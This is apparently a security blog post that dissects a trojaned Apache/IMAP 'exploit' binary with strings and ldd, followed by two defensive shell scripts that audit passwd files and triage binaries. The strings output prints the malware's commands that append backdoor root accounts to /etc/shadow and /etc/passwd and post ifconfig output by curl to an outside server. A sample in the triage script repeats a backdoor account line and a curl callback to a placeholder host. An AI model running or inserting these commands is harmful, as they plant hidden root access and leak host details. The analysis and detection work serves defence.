This event struck me as unusual, so I wanted to share with you why it's normal to be paranoid.
While reading my RSS security feeds, I found a notification about an Apache/IMAP exploit, with a link on Security Focus.
The grammatical structure of the message appears odd, to say the least. Checking out the site, there are two gzipped tarballs available for download: one includes the source code as well as a binary, the other is just precompiled binaries.
I wanted to show you how you can use the 'strings' and 'ldd' commands to find information about an executable. Before you run an untrusted executable, especially as root, you had better know for darn sure what it is.
ldd lists the shared libraries a dynamically linked executable was compiled against; in this case the executable wasn't statically compiled, so there is something to list.
luser@meowbox:~/Desktop$ ldd massxpl
linux-gate.so.1 => (0xffffe000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
Now, look what strings has to say:
luser@meowbox:~/Desktop$ strings massxpl
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
HEAD / HTTP/1.1
Root priviledge is needed - use your root user OK!
Rename your target list filename to target.txt
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d
As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users (newbie and toor) to your /etc/shadow file and then to your /etc/passwd file. It then connects to an HTTP server using curl and reports your IP addresses (http://www.trancefix.org/hell/save.php) so the malware author can come back later and connect to you.
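A host-side check for what that payload leaves behind, added here as an example and not part of the original post: it audits a passwd file for extra UID-0 accounts, for accounts added since a known-good baseline, and for accounts whose home directory sits in a world-writable temp location (the newbie account above lives in /var/tmp). The sample passwd files are constructed inline and imitate the entries seen in the strings output; the function names, the baseline contents and the temp-directory pattern are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): audit a passwd file for the
# kind of accounts the trojan plants. Works on copies/snapshots you hand it,
# never on the live /etc/passwd directly, so it is safe to run anywhere.

# Every account with UID 0 whose name is not root. Any output here is a
# finding: there is no legitimate reason for a second UID-0 login.
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Usernames present in the current file ($2) but absent from a known-good
# baseline ($1), sorted. A snapshot taken at install time is the baseline.
added_accounts() {
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print $1 }' "$1" "$2" | sort
}

# Accounts whose home directory is /tmp or /var/tmp (or below them):
# a world-writable home is a classic sign of a throwaway backdoor user.
temp_homes() {
    awk -F: '$6 ~ /^\/(var\/)?tmp(\/|$)/ { print $1 }' "$1"
}

# Constructed sample: a minimal clean passwd file (assumed baseline).
make_baseline() {
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$1"
    printf 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n' >> "$1"
    printf 'luser:x:1000:1000:luser:/home/luser:/bin/bash\n' >> "$1"
}

# Constructed sample: the same file after the two entries from the
# strings output have been appended.
make_compromised() {
    make_baseline "$1"
    printf 'toor:x:0:0:toor:/var:/bin/sh\n' >> "$1"
    printf 'newbie:x:10000:65534:toor:/var/tmp:/bin/sh\n' >> "$1"
}

baseline=$(mktemp)
current=$(mktemp)
make_baseline "$baseline"
make_compromised "$current"
echo "Extra UID-0 accounts:      $(extra_uid0 "$current" | tr '\n' ' ')"
echo "Accounts not in baseline:  $(added_accounts "$baseline" "$current" | tr '\n' ' ')"
echo "Accounts homed in tmp:     $(temp_homes "$current" | tr '\n' ' ')"
rm -f "$baseline" "$current"
```

Point the same three functions at a copy of the real /etc/passwd and at a snapshot taken when the box was built; the baseline diff alone would have caught both accounts here, and the UID-0 check catches toor even without a baseline.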
This is poor-quality code that makes several assumptions: that curl exists on the system, and that ifconfig will return an address outside the IANA reserved (private) ranges.
Either way, this should serve as a wake-up call: malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking the necessary caution, you'll get owned.
Even if you don't know C, read the source code; unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.
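The strings-based triage from this post, scripted, as an added example that is not part of the original post: it approximates strings with tr and grep (so it needs nothing from binutils), tags each extracted string that writes to /etc/shadow or /etc/passwd, carries a URL, mentions root, or looks like a shell command, and counts the hits. The sample "binary" it inspects is constructed inline with a placeholder callback domain; the function names and the indicator patterns are assumptions for this example, and the pattern list is a starting point rather than a complete one.

```shell
#!/bin/sh
# Added example (not from the original post): pre-execution triage of an
# untrusted binary. Extracts printable strings and flags the kinds of
# indicators the post found, without ever executing the file.

# Print runs of at least four printable characters, roughly what `strings`
# does. LC_ALL=C keeps [:print:] to plain ASCII.
extract_strings() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | grep -E '^.{4,}$'
}

# Read strings on stdin; print each suspicious one prefixed with a category.
# Patterns are checked in order, so a string gets only its first matching tag.
tag_suspicious() {
    while IFS= read -r line; do
        case "$line" in
            *"/etc/shadow"*|*"/etc/passwd"*)
                printf '[credential-file write] %s\n' "$line" ;;
            *"http://"*|*"https://"*)
                printf '[network callback] %s\n' "$line" ;;
            *[Rr]oot*)
                printf '[requires root] %s\n' "$line" ;;
            *">>"*|*"/bin/sh"*)
                printf '[shell command] %s\n' "$line" ;;
        esac
    done
}

# Number of flagged strings in a file. Zero means these patterns did not
# fire, which is not the same as the file being safe.
count_indicators() {
    extract_strings "$1" | tag_suspicious | wc -l | tr -d ' '
}

# Constructed sample: a fake "binary" whose embedded strings imitate the
# post's findings. The callback domain is a placeholder, not a real host.
make_sample() {
    printf '\177ELF\n' > "$1"   # ELF magic so the file starts like a real binary
    printf 'Usage: %%s -h host\n' >> "$1"
    printf 'Root privilege is needed\n' >> "$1"
    printf 'echo backdoor:x:0:0::/:/bin/sh >> /etc/passwd\n' >> "$1"
    printf '/usr/bin/curl -d "target=$(hostname)" http://callback.example.invalid/save.php\n' >> "$1"
    printf 'socket creation error\n' >> "$1"
}

sample=$(mktemp)
make_sample "$sample"
echo "Suspicious strings in $sample:"
extract_strings "$sample" | tag_suspicious
echo "Total flagged: $(count_indicators "$sample")"
rm -f "$sample"
```

Two caveats worth keeping in mind. A clean result only means these patterns did not fire; embedded strings are trivial to hide by encoding them, which is why the advice above to read the source still stands. And for the library listing, prefer readelf -d or objdump -p over ldd on a file you do not trust: ldd works by asking the dynamic loader to run the program in trace mode, and its own man page warns that an untrusted executable can get code run that way.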